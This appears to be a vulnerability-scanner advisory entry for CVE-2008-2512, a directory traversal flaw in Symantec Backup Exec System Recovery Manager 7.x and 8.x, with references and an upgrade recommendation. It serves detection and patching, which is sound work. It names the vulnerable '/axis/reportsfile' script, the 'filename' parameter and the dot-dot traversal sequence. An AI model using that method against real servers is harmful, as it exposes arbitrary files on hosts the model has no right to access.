| VID |
23210 |
| Severity |
30 |
| Port |
8080, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Symantec Backup Exec System RM is vulnerable to a directory traversal vulnerability via the 'filename' parameter. Symantec Backup Exec System Recovery Manager 7.x before 7.0.4 and 8.x before 8.0.2 could allow a remote attacker to traverse directories on the system, caused by improper validation of user-supplied input passed to the 'filename' parameter of the '/axis/reportsfile' script. By sending a specially-crafted HTTP GET request containing "dot dot" sequences (\..\), a remote attacker could read arbitrary files on the affected host.
* References:
http://securityresponse.symantec.com/avcenter/security/Content/2008.05.28c.html
http://www.frsirt.com/english/advisories/2008/1686
http://secunia.com/advisories/30432
* Platforms Affected:
Symantec, BackupExec System Recovery Manager 7.0
Symantec, BackupExec System Recovery Manager 7.0.1
Symantec, BackupExec System Recovery Manager 7.0.2
Symantec, BackupExec System Recovery Manager 7.0.3
Symantec, BackupExec System Recovery Manager 8.0
Symantec, BackupExec System Recovery Manager 8.0.1 |
| Recommendation |
Upgrade to the latest version of Backup Exec System Recovery Manager (7.0.4 or 8.0.2 or later), as listed in SYM08-013 at http://securityresponse.symantec.com/avcenter/security/Content/2008.05.28c.html |
| Related URL |
CVE-2008-2512 (CVE) |
| Related URL |
29350 (SecurityFocus) |
| Related URL |
42714 (ISS) |
|
